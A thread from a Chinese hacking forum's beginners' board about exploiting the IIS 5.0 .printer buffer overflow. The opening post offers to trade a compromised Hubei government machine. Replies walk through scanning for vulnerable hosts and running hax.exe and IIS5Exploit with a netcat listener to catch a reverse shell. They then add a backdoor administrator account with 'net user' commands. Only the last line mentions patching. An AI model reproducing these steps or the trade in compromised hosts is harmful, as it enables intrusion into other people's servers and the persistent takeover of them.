|
 | 作者: rekcah [rekcah]
 论坛用户 |
登录 |
| 哪位能简单说一下什么是IIS5.0的printer溢出? 是不是没打过补丁的IIS5都有这种漏洞? 用什么扫描器能扫出一个网段中有这种漏洞的机器? 如果有人有这种漏洞的机器,我愿意用湖北某地级市的政府机关肉鸡(3389)与其共享。 联系方式:QQ:172027566 |
| 地主 发表时间: 04/03 17:57 |
 | 回复: cyshaoping [cyshaoping]  论坛用户 |
登录 |
|
用x-scan 我给你找 |
| B1层 发表时间: 04/03 18:00 |
| 回复: rekcah [rekcah] 论坛用户 |
登录 |
|
x-scan有这个功能吗? 是不是好要snack IIS? |
| B2层 发表时间: 04/03 18:05 |
| 回复: cyshaoping [cyshaoping] 论坛用户 |
登录 |
|
有阿 不用 |
| B3层 发表时间: 04/03 18:07 |
| 回复: rekcah [rekcah] 论坛用户 |
登录 |
|
斑竹能否具体说一下?――谢谢 [此贴被 rekcah(rekcah) 在 04月03日18时33分 编辑过] |
| B4层 发表时间: 04/03 18:09 |
| 回复: cyshaoping [cyshaoping] 论坛用户 |
登录 |
|
前几天还有,怎么今天就没了 |
| B5层 发表时间: 04/03 18:45 |
 | 回复: vishx [vishx] 论坛用户 |
登录 |
|
先到http://www.cnlvker.com下载:呀扫描器!! 假设你已经扫到了这样的主机。下面就用到hax.exe了 c:\\hax空格211.22.1.1空格80 上面的是有printer漏洞的主机,80是端口,当然你可以选其它的端口,但是为了 更好的创建超级用户,我建议大家选80端口,因为你选其它的端口,可能会被防火墙 过滤了,我不敢保证100%的有效啊,是假设运气好的话,我记得一次我用此工具连续 得逞,呵呵!当是只能多中文的主机有效啊!我用美国的主机试了一下,行不通啊!那位 大侠可以用此软件搞定美国主机要和我说啊! 对了忘了告诉大家了!用这个东东建的超和用户名是hax 密码也是hax |
| B6层 发表时间: 04/03 19:21 |
| 回复: vishx [vishx] 论坛用户 |
登录 |
|
*.printer漏洞: 微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,缺省情况下该映射存在。当远程用户提交对.printer的URL请求时,IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。 同样的,用流光扫一个存在*.printer漏洞的机器,IP:202.1.1.4 这里使用小榕的IIS5Exploit。 IIS5 .Printer Exploit 使用说明: 本程序适用于英文版IIS 5.0 1、首先在本机用NC开一个监听端口。 C:\>nc -l -p 99 2、运行IIS5Exploit D:\>IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.1 99 ===========IIS5 English Version .Printer Exploit.=========== ===Written by Assassin 1995-2001. http://www.netXeyes.com=== Connecting 211.152.188.1 ...OK. Send Shell Code ...OK IIS5 Shell Code Send OK 其中211.152.188.1指向本地IP。 稍等片刻,如果成功在本机NC舰艇的端口出现: C:\>nc -l -p 99 Microsoft Windows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\> 可以执行命令。如: C:\>net user hack password /add The command completed successfully. C:\>net localgroup administrartors hack /add 这样就创建了一个属于Administrator组的用户Hack,密码为password.。 要解决此漏洞有两种方法1. 删除.printer扩展 2. 安装微软提供的补丁 |
| B7层 发表时间: 04/03 19:23 |
| 回复: rekcah [rekcah] 论坛用户 |
登录 |
|
非常感谢大家,这里真的很热情。我以前经常去小容的刀光,但是不知为什么这几天上不去了,有人知道是什么原因吗? |
| B8层 发表时间: 04/04 18:15 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: IIS5.0的printer溢出